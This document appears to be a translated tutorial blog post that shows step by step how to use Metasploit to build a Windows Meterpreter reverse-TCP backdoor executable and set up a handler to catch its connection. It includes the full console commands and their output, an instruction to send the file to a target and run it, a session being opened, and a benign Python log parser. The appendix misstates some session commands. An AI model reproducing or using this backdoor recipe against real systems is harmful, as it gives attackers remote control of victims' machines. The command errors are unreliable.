1. Generating the backdoor

1.1 Select the payload

msf > use payload/windows/meterpreter/reverse_tcp

1.2 Use the show options command to view the options that need to be configured:

msf payload(reverse_tcp) > show options 

Module options (payload/windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)

   LHOST                      yes       The listen address

   LPORT     4444             yes       The listen port

1.3 Configure the payload options (here LHOST is the IP address of the *** side, i.e. the host that listens for the connection)

msf payload(reverse_tcp) > set LHOST 172.16.0.102

LHOST => 172.16.0.102

msf payload(reverse_tcp) > show options 

Module options (payload/windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)

   LHOST     172.16.0.102     yes       The listen address

   LPORT     4444             yes       The listen port

1.4 Generate the backdoor file (-t specifies the backdoor file type, exe in this example; -f specifies the file path and file name)

msf payload(reverse_tcp) > generate -t exe -f /Users/jiangzhehao/Downloads/4.exe

[*] Writing 73802 bytes to /Users/jiangzhehao/Downloads/4.exe...

2. Configuring the exploit (handler) side

2.1 Use exploit/multi/handler as the handler

msf > use exploit/multi/handler

2.2 Select the payload matching the backdoor generated above

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

2.3 Configure the listen address and port required by the module options

msf exploit(handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description

   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)

   LHOST                      yes       The listen address

   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name

   --  ----

   0   Wildcard Target

msf exploit(handler) > set LHOST 172.16.0.102

LHOST => 172.16.0.102

2.4 Once configured, use the exploit command to start listening

msf exploit(handler) > exploit 

[*] Started reverse TCP handler on 172.16.0.102:4444 

[*] Starting the payload handler...

3. Send the generated backdoor to the client and execute it there

4. Wait in the listening console for the client to connect; once it connects, the following output appears:

[*] Sending stage (957999 bytes) to 172.16.0.102

[*] Meterpreter session 1 opened (172.16.0.102:4444 -> 172.16.0.102:53175) at 2016-05-08 20:12:37 +0800

meterpreter > exit

[*] Shutting down Meterpreter...

[*] 192.168.231.128 - Meterpreter session 1 closed.  Reason: User exit

msf exploit(handler)

(Once the server side exits, the client exits immediately as well)
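An added example, not part of the original post: a small Python parser for the handler messages shown above, so that a saved msfconsole log can be turned into a per-session timeline (peer address, listener port, open time, close reason) for engagement records and for matching against network logs. The sample log is constructed from the output quoted above; the message formats are assumed to be exactly as printed there.

```python
import re
from datetime import datetime

# Constructed sample: the handler output quoted in the post above.
SAMPLE_LOG = """\
[*] Started reverse TCP handler on 172.16.0.102:4444
[*] Starting the payload handler...
[*] Sending stage (957999 bytes) to 172.16.0.102
[*] Meterpreter session 1 opened (172.16.0.102:4444 -> 172.16.0.102:53175) at 2016-05-08 20:12:37 +0800
[*] Shutting down Meterpreter...
[*] 192.168.231.128 - Meterpreter session 1 closed.  Reason: User exit
"""

# One regex per message type (formats assumed from the post); named groups become event fields.
PATTERNS = {
    "listen": re.compile(r"Started reverse TCP handler on (?P<lhost>[\d.]+):(?P<lport>\d+)"),
    "stage": re.compile(r"Sending stage \((?P<size>\d+) bytes\) to (?P<peer>[\d.]+)"),
    "open": re.compile(r"Meterpreter session (?P<sid>\d+) opened "
                       r"\((?P<lhost>[\d.]+):(?P<lport>\d+) -> (?P<peer>[\d.]+):(?P<pport>\d+)\) "
                       r"at (?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} [+-]\d{4})"),
    "close": re.compile(r"(?P<peer>[\d.]+) - Meterpreter session (?P<sid>\d+) closed\.\s+"
                        r"Reason: (?P<reason>.+?)\s*$"),
}

def parse_line(line):
    """Return {'kind': ..., fields...} for a recognised handler line, else None."""
    for kind, rx in PATTERNS.items():
        m = rx.search(line)
        if m:
            ev = {"kind": kind, **m.groupdict()}
            for key in ("sid", "lport", "pport", "size"):
                if key in ev:
                    ev[key] = int(ev[key])
            if "ts" in ev:  # '+0800' style offset is handled by %z
                ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%d %H:%M:%S %z")
            return ev
    return None

def parse_log(text):
    return [ev for ev in map(parse_line, text.splitlines()) if ev]

def session_timeline(events):
    """Group open/close events by session id; a close without an open is still recorded."""
    timeline = {}
    for ev in events:
        if ev["kind"] == "open":
            timeline[ev["sid"]] = {"peer": ev["peer"], "lport": ev["lport"], "opened": ev["ts"],
                                   "closed": False, "reason": None}
        elif ev["kind"] == "close":
            entry = timeline.setdefault(ev["sid"], {"peer": ev["peer"], "lport": None, "opened": None})
            entry.update(closed=True, reason=ev["reason"])
    return timeline

if __name__ == "__main__":
    for sid, info in session_timeline(parse_log(SAMPLE_LOG)).items():
        print(sid, info)
```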

Appendix:

1. The generated backdoor can be produced in many formats, listed below:

bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-net,psh-reflection,psh-cmd,vba,vba-exe,vba-psh,vbs,war

2. For a returned connection, use background to move the current session to the background;

3. Sessions moved to the background can be viewed with session -i, and session -i id switches the specified background session back to the foreground;

4. Sessions moved to the background can be viewed with session -i, and session -k id can also be used to terminate the specified background session;